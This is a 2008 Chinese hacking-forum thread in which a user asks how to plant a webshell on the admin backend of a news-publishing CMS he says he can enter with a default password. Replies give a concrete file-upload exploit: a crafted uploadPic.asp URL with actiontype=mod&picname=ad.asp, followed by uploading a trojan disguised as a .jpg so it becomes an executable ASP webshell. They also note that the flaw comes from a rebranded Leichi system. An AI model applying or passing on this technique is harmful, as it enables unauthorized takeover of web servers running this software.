[讨论]这样的后台如何拿webshell?

webshell, 后台, 讨论

[讨论]这样的后台如何拿webshell?
议题作者：hackwind
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

后台无备份。
有上传，但上传漏洞利用不存在。
数据库是mdb格式，无法备份，所以插入一句话也不行。

其他一句话插入文件，无文件可利用。
这样的后台如何拿webshell？

简单的找了个这样的系统。就是漏洞很多的宁乡热线新闻发布系统，后台直接玩呢个密码能进，但webshell我测试一下午是在是无能为力，小弟新手，大家看看有没有好的方法？

刚刚发帖子忘记添加附件，再发一次。清管理删除上个帖子。
附件

宁乡热线新闻发布管理系统 v1.2 .rar (213 KB)
2008-1-6 15:30, 下载次数: 153
帖子13 精华0 积分39 阅读权限40 性别男来自幽谷客在线时间25 小时注册时间2007-11-4 最后登录2008-6-7 查看详细资料TOP 让女孩一夜变的更有女人味

优格

荣誉会员

shirley

3.A.S.T士兵

Rank: 1

帖子: 21
积分: 34
威望: 42
金钱: 41
在线时间: 1 小时

2楼

发表于 2008-7-24 17:21 | 只看该作者

http://127.0.0.1/admin/uploadPic ... &picname=ad.asp
然后把马保存为.jpg
上传
在uppic目录下就有ad.asp了
http://127.0.0.1/uppic/ad.asp
帖子227 精华2 积分797 阅读权限100 性别男在线时间123 小时注册时间2005-5-29 最后登录2008-7-23 查看详细资料TOP 您知道您年薪应是多少?

awolf

晶莹剔透§烈日灼然

TOP

杰仔

3.A.S.T士兵

Rank: 1

帖子: 12
积分: 18
威望: 24
金钱: 18
在线时间: 0 小时

3楼

发表于 2008-7-24 17:21 | 只看该作者

这个名为宁乡热线新闻发布管理系统其实他是雷池系统的一个改名而已~~核心没有改变
雷池系统有一个上传漏洞，就 1楼所说~
帖子14 精华0 积分51 阅读权限40 在线时间19 小时注册时间2007-12-3 最后登录2008-7-23 查看详细资料TOP 您知道您年薪应是多少?

hackwind

晶莹剔透§烈日灼然

TOP

PLAN2000

3.A.S.T士兵

Rank: 1

帖子: 17
积分: 25
威望: 33
金钱: 24
在线时间: 0 小时

4楼

发表于 2008-7-24 17:21 | 只看该作者

我试了，果真是这样啊。
但是想追根究底啊
http://127.0.0.1/admin/uploadPic.asp?actiontype=mod&picname=
这个actiontype=mod&picname=是怎么构造出来的？怎么想到这里了？picname改成什么，比如是1.asp就会传上一个1.asp。前面的actiontype=mod是什么意思啊？
小弟不才。asp是一窍不通。不会漏洞分析。
学习了。
帖子13 精华0 积分39 阅读权限40 性别男来自幽谷客在线时间25 小时注册时间2007-11-4 最后登录2008-6-7 查看详细资料TOP

awolf

晶莹剔透§烈日灼然

TOP

sam_slk

3.A.S.T士兵

Rank: 1

帖子: 15
积分: 22
威望: 29
金钱: 29
在线时间: 0 小时

5楼

发表于 2008-7-24 17:21 | 只看该作者

那还是去看下asp教程吧！（推荐黑鹰的asp教程）
漏洞文件在uploadpic.asp，具体分析可以看下这个文章：
http://bbs.awolf07.cn/viewthread.php?tid=66&extra=page%3D1
帖子14 精华0 积分51 阅读权限40 在线时间19 小时注册时间2007-12-3 最后登录2008-7-23 查看详细资料TOP 软件项目外包

28度的冰